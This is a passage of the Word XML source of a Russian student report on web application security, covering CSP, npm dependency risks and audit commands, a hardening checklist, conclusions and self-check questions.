        <w:t xml:space="preserve"> и собрать отчёты, затем включить принудительно. Полезны </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:color w:val="A31515"/>
        </w:rPr>
        <w:t xml:space="preserve">nonce</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:color w:val="A31515"/>
        </w:rPr>
        <w:t xml:space="preserve">hash</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> для необходимых инлайн-скриптов. Ограничения: CSP не спасает от DOM-based XSS без опасного sink, а </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:color w:val="A31515"/>
        </w:rPr>
        <w:t xml:space="preserve">'unsafe-inline'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:color w:val="A31515"/>
        </w:rPr>
        <w:t xml:space="preserve">script-src</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> обнуляет защиту (в нашем проекте </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:color w:val="A31515"/>
        </w:rPr>
        <w:t xml:space="preserve">unsafe-inline</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> разрешён только для стилей).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">7. Утечки через зависимости в npm</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Реальный риск: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:color w:val="A31515"/>
        </w:rPr>
        <w:t xml:space="preserve">npm install</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> тянет сотни пакетов, часть — транзитивные, часть может быть скомпрометирована (typosquatting, захват аккаунта мейнтейнера, вредоносный postinstall-скрипт).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Практика защиты:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">npm audit                 # известные уязвимости</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">npm audit fix             # без ломающих изменений</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">npm outdated              # что устарело</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">npx better-npm-audit audit   # строже, с игнорированием dev-зависимостей</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">npx snyk test             # альтернативный сканер (есть бесплатный тариф)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Правила:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="284"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">• не ставить пакет «на всякий случай» — каждая зависимость расширяет поверхность атаки;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="284"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">• фиксировать версии (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:color w:val="A31515"/>
        </w:rPr>
        <w:t xml:space="preserve">package-lock.json</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> в репозитории, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:color w:val="A31515"/>
        </w:rPr>
        <w:t xml:space="preserve">npm ci</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> в CI);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="284"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">• не запускать </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:color w:val="A31515"/>
        </w:rPr>
        <w:t xml:space="preserve">postinstall</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-скрипты вслепую (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:color w:val="A31515"/>
        </w:rPr>
        <w:t xml:space="preserve">npm ci --ignore-scripts</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> там, где возможно);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="284"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">• проверять имя пакета (typosquatting: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:color w:val="A31515"/>
        </w:rPr>
        <w:t xml:space="preserve">crossenv</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> вместо </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:color w:val="A31515"/>
        </w:rPr>
        <w:t xml:space="preserve">cross-env</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="284"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">• использовать CI-проверку аудита и обновлять зависимости планово, а не «когда сломается»;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="284"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">• для критичных проектов — pinning + приватный реестр/зеркало.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">8. Точечный чек-лист для защиты проекта</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="284"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">1. Пароли: bcrypt-хеш (никакого md5/SHA в открытом виде).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="284"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2. Сессия: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:color w:val="A31515"/>
        </w:rPr>
        <w:t xml:space="preserve">httpOnly</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> + </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:color w:val="A31515"/>
        </w:rPr>
        <w:t xml:space="preserve">SameSite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regenerate()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> после входа, срок жизни.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="284"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3. CSRF: токен в сессии + скрытое поле + </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:color w:val="A31515"/>
        </w:rPr>
        <w:t xml:space="preserve">timingSafeEqual</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="284"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4. Валидация: на сервере, доменными сущностями; клиентская — только подсказка.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="284"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5. XSS: React </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:color w:val="A31515"/>
        </w:rPr>
        <w:t xml:space="preserve">{value}</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> / EJS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:color w:val="A31515"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;%= %&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, никакого </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:color w:val="A31515"/>
        </w:rPr>
        <w:t xml:space="preserve">innerHTML</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> для пользовательских данных.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="284"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">6. Ошибки: 5xx не показывают стек пользователю, детали уходят в лог.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="284"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">7. Загрузка файлов: белый список MIME, лимит размера, сгенерированное имя файла, каталог статики без исполнения.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="284"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">8. Лимит частоты на вход и формы.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="284"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">9. Заголовки: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:color w:val="A31515"/>
        </w:rPr>
        <w:t xml:space="preserve">helmet</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> + CSP + </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:color w:val="A31515"/>
        </w:rPr>
        <w:t xml:space="preserve">X-Content-Type-Options: nosniff</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> + </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:color w:val="A31515"/>
        </w:rPr>
        <w:t xml:space="preserve">X-Frame-Options: DENY</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="284"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">10. Зависимости: минимум пакетов, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:color w:val="A31515"/>
        </w:rPr>
        <w:t xml:space="preserve">npm audit</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> перед сдачей, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:color w:val="A31515"/>
        </w:rPr>
        <w:t xml:space="preserve">package-lock.json</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> в репозитории.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">9. Мини-выводы</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="284"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:color w:val="A31515"/>
        </w:rPr>
        <w:t xml:space="preserve">innerHTML</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> + пользовательские данные = XSS; правильный путь — текст, а не разметка.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="284"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">• CSRF лечится </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:color w:val="A31515"/>
        </w:rPr>
        <w:t xml:space="preserve">SameSite</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> и токеном, а не «отключением cookie».</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="284"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">• CORS — не защита, а разрешение чтения в браузере; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:color w:val="A31515"/>
        </w:rPr>
        <w:t xml:space="preserve">*</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> с credentials — грубая ошибка.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="284"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">• Инъекции закрываются параметризацией и валидацией, CSP — эшелонированная защита.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="284"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">• Зависимости — тоже код: их надо проверять и обновлять.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Вопросы для самопроверки</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="284"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">1. Почему </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:color w:val="A31515"/>
        </w:rPr>
        <w:t xml:space="preserve">textContent</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> безопаснее </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:color w:val="A31515"/>
        </w:rPr>
        <w:t xml:space="preserve">innerHTML</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">? Что именно «исполняет» браузер?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="284"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2. Чем хранимая XSS опаснее отражённой?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="284"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3. Как работает CSRF-атака и почему </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:color w:val="A31515"/>
        </w:rPr>
        <w:t xml:space="preserve">SameSite=Lax</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> её ломает?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="284"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4. Почему </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:color w:val="A31515"/>
        </w:rPr>
        <w:t xml:space="preserve">Access-Control-Allow-Origin: *</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> вместе с credentials запрещён?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="284"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5. Что даёт CSP, если разработчик всё-таки вставил чужой скрипт?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="284"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">6. Как проверить, что зависимость не содержит известных уязвимостей?</w:t>
      </w:r>
    </w:p>
    <w:sectPr>
      <w:footerReference xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships"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№5. Безопасность веб-приложений: OWASP Top 10 на практике</dc:title>
  <dc:creator>Студент</dc:creator>
  <cp:lastModifiedBy>Студент</cp:lastModifiedBy>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-10-12T13:36:07Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-10-12T13:36:07Z</dcterms:modified>
</cp:coreProperties>
</file>